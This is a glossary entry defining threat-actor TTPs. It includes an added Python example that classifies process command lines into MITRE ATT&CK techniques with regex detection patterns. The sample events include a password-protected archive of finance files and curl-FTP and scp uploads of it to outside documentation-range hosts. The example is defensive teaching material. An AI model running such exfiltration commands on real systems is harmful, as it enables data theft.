TTPs (tactics, techniques, and procedures)

Definition: TTPs (tactics, techniques, and procedures)

TTPs describe how a malicious actor operates: how attackers plan, execute and manage their operations. They put a threat in context by revealing the steps an actor actually takes, for example when exfiltrating data, rather than just the isolated indicators left behind.

To understand and fight your enemy you need to understand their tactics, techniques and procedures.

Tactics: the way the threat actor operates at the highest level, i.e. what they are trying to achieve at each stage of the attack and their overall approach to it.

For example, the attacker gains a foothold through social engineering, physical infiltration of the organization or information gathered from the Internet, or relies on zero-day vulnerabilities or tools of their own.

Techniques: the methods and tools used to carry out a tactic, for instance for information gathering or for compromising a system. This is a more detailed description of the behavior.

Procedures: the specific sequence of actions (the exact tools, commands and order of steps) a given actor follows to apply a technique. This is the most detailed level.
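The three levels above form a hierarchy, and that hierarchy is what makes TTPs useful for detection. The following is an added example, not part of the original page: a small Python catalogue that maps observed process command lines to a procedure, rolls each procedure up to its technique and then to its tactic, and shows that two different procedures (an FTP upload with curl and an scp copy) land on the same tactic, Exfiltration. The tactic and technique names and IDs are taken from MITRE ATT&CK; the procedure regexes and the sample events are constructed for this illustration and do not come from any real threat report.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Procedure:
    name: str
    pattern: str  # regex matched against a process command line


@dataclass(frozen=True)
class Technique:
    id: str
    name: str
    tactic_id: str
    procedures: tuple


# ATT&CK tactic IDs and names (real identifiers).
TACTICS = {
    "TA0009": "Collection",
    "TA0010": "Exfiltration",
}

# ATT&CK technique IDs/names are real; the procedure regexes are illustrative
# assumptions written for this example, not taken from any actor's playbook.
TECHNIQUES = [
    Technique("T1560.001", "Archive via Utility", "TA0009", (
        Procedure("7-Zip password-protected archive", r"\b7z(?:\.exe)?\s+a\b.*\s-p\S+"),
        Procedure("WinRAR archive", r"\brar(?:\.exe)?\s+a\b"),
    )),
    Technique("T1048.003", "Exfiltration Over Unencrypted Non-C2 Protocol", "TA0010", (
        Procedure("curl FTP upload", r"\bcurl(?:\.exe)?\b.*\s-T\s+\S+\s+ftp://"),
    )),
    Technique("T1048.002", "Exfiltration Over Asymmetric Encrypted Non-C2 Protocol", "TA0010", (
        Procedure("scp to external host", r"\bscp(?:\.exe)?\s+\S+\s+\S+@\S+:"),
    )),
]


@dataclass(frozen=True)
class Match:
    event: str
    tactic: str
    technique: str
    procedure: str


def classify(command_lines):
    """Map each observed command line to procedure -> technique -> tactic."""
    matches = []
    for cmd in command_lines:
        for tech in TECHNIQUES:
            for proc in tech.procedures:
                if re.search(proc.pattern, cmd, re.IGNORECASE):
                    matches.append(Match(cmd, TACTICS[tech.tactic_id],
                                         f"{tech.id} {tech.name}", proc.name))
    return matches


def tactics_observed(matches):
    """Distinct tactics in order first seen: the highest-level view of the activity."""
    seen = []
    for m in matches:
        if m.tactic not in seen:
            seen.append(m.tactic)
    return seen


# Constructed sample process-creation events (not real telemetry);
# the IP addresses are from the documentation ranges.
SAMPLE_EVENTS = [
    r"7z.exe a -pS3cret! C:\Users\Public\q3.7z C:\Finance\Reports\*",
    r"curl.exe -T C:\Users\Public\q3.7z ftp://203.0.113.10/upload/",
    r"scp /tmp/q3.7z backup@198.51.100.7:/incoming/",
    r"notepad.exe C:\Users\alice\notes.txt",  # benign, must not match
]

if __name__ == "__main__":
    found = classify(SAMPLE_EVENTS)
    for m in found:
        print(f"{m.tactic:12} | {m.technique:55} | {m.procedure}")
    print("tactics observed:", tactics_observed(found))
```

The procedure-level regexes are deliberately the most brittle part: an actor who swaps 7-Zip for WinRAR or curl for scp defeats a detection written against one exact command line, which is why analysts group procedures under techniques and tactics and reason at those levels when attributing or hunting for activity.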

According to the Definitive Guide to Cyber Threat Intelligence, they are “patterns of activities or methods associated with a specific threat actor or group of threat actors”.